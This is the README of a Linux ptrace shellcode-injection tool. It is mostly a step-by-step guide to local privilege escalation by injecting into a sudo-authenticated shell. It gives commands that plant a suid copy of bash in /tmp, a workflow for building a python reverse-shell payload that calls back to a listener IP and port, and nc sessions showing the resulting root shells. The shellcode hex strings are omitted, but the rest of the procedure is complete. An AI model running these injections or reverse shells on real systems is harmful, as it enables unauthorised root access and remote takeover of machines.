# drx_ptrace_shellcode_injector
drx ptrace shellcode injector

Repository: https://github.com/therealdreg/drx_ptrace_shellcode_injector (owner: therealdreg, language: C, license: MIT, homepage: https://rootkit.es/)
Topics: debugging-tool, linux, ptrace, ptrace-injection, shellcode-injection, x86, x86-64
Created 2020-11-17, last push 2023-08-11.

Please consider making a donation: https://github.com/sponsors/therealdreg

**WARNING: only works on x86_64 systems (x86 will be supported)**

Current support:
* A drx built for x86_64 can inject code into an x86_64 process
* A drx built for x86_64 can inject code into an x86 process

## How to compile

```
gcc -o drx drx.c
```

## How to use

You can inject the following shellcodes:

### Default builtin hello world shellcode

**./drx PID**

```
./drx 4940
```

### bash suid local privilege escalation via ptrace misconfiguration

Based on: https://github.com/David-Reguera-Garcia-Dreg/ptrace_misconfiguration_local_privilege_escalation

Injects into a sudo-authenticated shell process: **/bin/sh -c "/bin/echo | /usr/bin/sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | /usr/bin/sudo -S /usr/bin/chmod +s /tmp/bash >/dev/null 2>&1"**

For a 32 bit process:
```
./drx PID "[x86 shellcode hex string omitted]"
```

For a 64 bit process:
```
./drx PID "[x86_64 shellcode hex string omitted]"
```

Now get root:
```
dreg@fr33project:~$ /tmp/bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)
bash-5.0#
```

### python reverse shell detached background: local privilege escalation via ptrace misconfiguration

Injects a python reverse shell into a sudo-authenticated shell process.

Based on: https://github.com/David-Reguera-Garcia-Dreg/python_reverse_shell_detached_background/

Steps for a **64 bit process**:

#### Using the pyrev64 script

Just execute **./drx PID $(./pyrev64 IP PORT)**

**WARNING: only ports in the range 1000 to 9999 are valid (no 89, no 10003 ...)**

Example with PID 2904, IP 127.0.0.1, PORT 3456:
```
./drx 2904 $(./pyrev64 127.0.0.1 3456)
```

Now get root:
```
root@fr33project:~# nc -lvp 3456
listening on [any] 3456 ...
connect to [51.195.45.136] from fr33project.org [51.195.45.136] 40508
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
```

#### By hand

Generate the IP string, for example for 51.195.45.136:
```
export IP_ADDR=51.195.45.136
xxd -p <<< `printf '%02x' ${IP_ADDR//./ }`  | sed 's/.$//' | sed 's/.$//' | sed 's/\(..\)/\\\\x&/g; s/, $//;'
```
result:
```
\\x33\\x33\\x63\\x33\\x32\\x64\\x38\\x38
```

Generate the PORT string (WARNING! only ports in the range 1000 to 9999 are valid, no 89, no 10003), for example for 6868:
```
xxd -p <<< 6868 | sed 's/.$//' | sed 's/.$//' | sed 's/\(..\)/\\\\x&/g; s/, $//;'
```
result:
```
\\x36\\x38\\x36\\x38
```

Replace **IP_HEX** and **PORT_HEX** in this command with the IP STR and PORT STR output:

```
echo -n "[x86_64 shellcode hex string omitted]" | sed 's/\\x39\\x39\\x39\\x39/PORT_HEX/g' | sed 's/\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31/IP_HEX/g'
```

For this case the end of the last command looks like:
```
... | sed 's/\\x39\\x39\\x39\\x39/\\x36\\x38\\x36\\x38/g' | sed 's/\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31/\\x33\\x33\\x63\\x33\\x32\\x64\\x38\\x38/g'
```

The output is the generated shellcode.

Now execute drx with the target PID and the generated shellcode, for example with PID 6978:

```
./drx 6978 "[generated shellcode hex string omitted]"
```

And done, you get a root shell from a sudo shell user:

```
dreg@51.195.45.136:~# nc -lvp 6868
listening on [any] 6868 ...
connect to [51.195.45.136] from fr33project.org [51.195.45.136] 38672
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
```
---

Another example for easy copy-paste: reverse shell to 127.0.0.1:9999, target pid 1081

```
./drx PID "[x86_64 shellcode hex string omitted]"
```

```
dreg@51.195.45.136:~# nc -lvp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from fr33project.org [127.0.0.1] 33622
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
```

# Contributors
* micronn: pyrev64 - https://github.com/micronn https://twitter.com/micronn386